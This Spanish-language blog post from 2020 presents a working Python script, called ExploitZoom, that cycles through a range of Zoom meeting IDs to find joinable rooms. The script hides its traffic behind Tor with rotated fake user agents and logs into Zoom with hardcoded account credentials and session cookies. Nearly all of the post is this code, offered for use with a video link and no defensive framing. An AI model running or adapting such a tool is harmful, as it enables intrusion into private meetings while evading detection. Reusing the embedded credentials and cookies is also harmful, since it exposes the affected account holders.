Explorando vulnerabilidades: Aplicación de Videoconferencias

25 Apr 2020 Mortal _Poison 0 WebApps

En esta ocasiòn, lograremos realizar un script en Python para automatizar un proceso en una de las aplicaciones màs usadas en la actualidad.


https://youtu.be/2gvdd3MVXBs

El còdigo, es el siguiente: 

 

#!/usr/bin/env python
# -*- coding: utf-8 -*-

#######################################################################
#								                                      #
#								                                      #	
# Coded By: Mortal_Poison					                          #
# YouTube: https://youtube.com/XecureLabs			                  #	
# WebPage: https://xecure-labs.com				                      #
#								                                      #
#								                                      #
#######################################################################

# Import libraries #

import requests, sys, os
from fake_useragent import UserAgent
from colorama import Fore, Back, Style 


# Start script #
os.system('cls||clear') # Clear terminal or cmd in Windows | *UX Systems
print(Fore.RED + 'Initialize script, please wait...') 

fakeUserAgent = UserAgent()

# URLs

https_url = "https://zoom.us/signin"


# Variables of rooms
room_existence = "https://zoom.us/wc/join/5737861291?pwd="
counter_start_from = 5737861200
counter_end_from = 5737862000

# Headers HTTP

cookies = "cookie: _zm_currency=USD; _zm_mtk_guid=c62250aaced54fe5912b95f7606c9e1b; _zm_lang=en-US; _ga=GA1.2.51372472.1587591211; _gid=GA1.2.682256936.1587591211; notice_behavior=implied,eu; notice_preferences=2:; notice_gdpr_prefs=0,1,2:; cmapi_gtm_bl=; cmapi_cookie_privacy=permit 1,2,3; zm_cluster=aw1; _zm_date_format=mm/dd/yy; NPS_0487a3ac_last_seen=1587591427817; NPS_0487a3ac_throttle=1587634628546; _zm_launcher=1587594628660; _zm_page_auth=aw1_c_M4l2RedpRsGN8ZsOJueUgQ; _zm_ssid=aw1_c_Md8X3md5Rye-jYDah6YUwQ; zm_aid=R61hzcXrTYyS1vzpptvd2w; zm_haid=137; _zm_kms=aw1_c_MEN5UE5qNksxTzU1NkwyJTJCZFFIenJRJTNEJTNEOmc2SXV0emZvNHlVMFNsaU9YUkJMREElM0QlM0Q; cred=D02653AAF5286B9559C4C510CF8A1E80; _zm_cdn_blocked=log_unblk"
headers = headers = {
    'User-Agent': fakeUserAgent.random,
    'cookie': cookies,
}

# Data HTTP

# Banned account
#data = {"email": "[email protected]", "password": "XecureLabs#1", "keep_me_signin": "true", "type": "100"}

data = {"email": "[email protected]", "password": "Qwerty1-23", "keep_me_signin": "true", "type": "100"}


# Constants

CONST_NOPERMISSION = "No permission."
CONST_INVALIDMEETING = " Invalid meeting ID.(3,001)"
CONST_VALIDROOM = "Please enter your meeting password and name to join the meeting"
CONST_COOKIEXPIRES = " New to Zoom?"
CONST_MEETINGNOTSTARTED = "The meeting has not started"
CONST_LOGGEDIN = "loggedIn: true,"

class ExploitZoom:
	def __init__(self):
		self.cookies = cookies

	def torConnections(self):
		self.session = requests.session()
		self.session.proxies = {}
		self.session.proxies['http'] = 'socks5h://localhost:9050'
		self.session.proxies['https'] = 'socks5h://localhost:9050'

	def doRequests(self):
		try:
			global counter_start_from, counter_end_from
			while counter_start_from < counter_end_from:
				requestZoomId = self.session.get("https://zoom.us/wc/join/" + str(counter_start_from), headers=headers, allow_redirects=True)
				#print(requestZoomId.text)
				print("\033[1;33m"+"[" + str(counter_start_from) + "] Meeting ID... URL: [" + requestZoomId.url + "]")
				if(requestZoomId.text.find(CONST_COOKIEXPIRES) == -1):
					print(Fore.RED+"Your cookie appears to have expired. Change it...")
					self.signIn()
				if(requestZoomId.text.find(CONST_NOPERMISSION) != -1):
					print(Fore.RED+"No permissions for the room...")
				if(requestZoomId.text.find(CONST_INVALIDMEETING) != -1):
					print(Fore.RED+"Parsing your cookies...\n")
				if(requestZoomId.text.find(CONST_VALIDROOM) != -1 or requestZoomId.text.find(CONST_MEETINGNOTSTARTED) != -1):
					print("\033[1;33m"+"Found valid meeting: [ " + "\033[;36m" + " https://zoom.us/wc/join/" + str(counter_start_from) + "\033[1;33m" + " ] \n")

				#print(requestZoomId.status_code)
				counter_start_from = counter_start_from + 1
		except:
				print("An error has ocurred.")            

	def signIn(self):
		with requests.Session() as session:
			requestSignIn = self.session.get(https_url)
			# Get cookies from the first get HTTP
			requestSignIn = self.session.post(https_url, data=data, allow_redirects = True, verify = False)
			# Get /profile with cookies of response of first request
			requestSignIn = self.session.get('https://zoom.us/profile', cookies = session.cookies.get_dict(), data=data, allow_redirects = True, verify = False)

		if(requestSignIn.text.find(CONST_LOGGEDIN) != -1):
			print("\033[;36m"+"Logged in Zoom!...")
		else:
			print(Fore.RED+"Sorry, you don't logged in Zoom...")
       
		return self.session

	def againLogin(self):
		session = requests.Session()
		print(session.cookies.get_dict())

		response = session.get('http://ifconfig.me')
		print(session.cookies.get_dict())

	def parseCookies(self):
		result = {}
		for item in self.cookies.split(';'):
			item = item.strip()
			if not item:
				continue
			if '=' not in item:
				result[item] = None
				continue
			name, self.cookies = item.split('=', 1)
			result[name] = self.cookies
		self.cookiesParsed = result
		return self.cookiesParsed		

callExploit = ExploitZoom()

callExploit.againLogin()

callExploit.torConnections()

# Parse cookies for requests
print("\033[;36m"+"Parsing your cookies...\n")
print(callExploit.parseCookies())

print("\033[;36m"+"\n===================")


callExploit.doRequests()

 

BY: Mortal _Poison

Noticias relacionadas

No hay comentarios todavía, Sé el primero en comentar.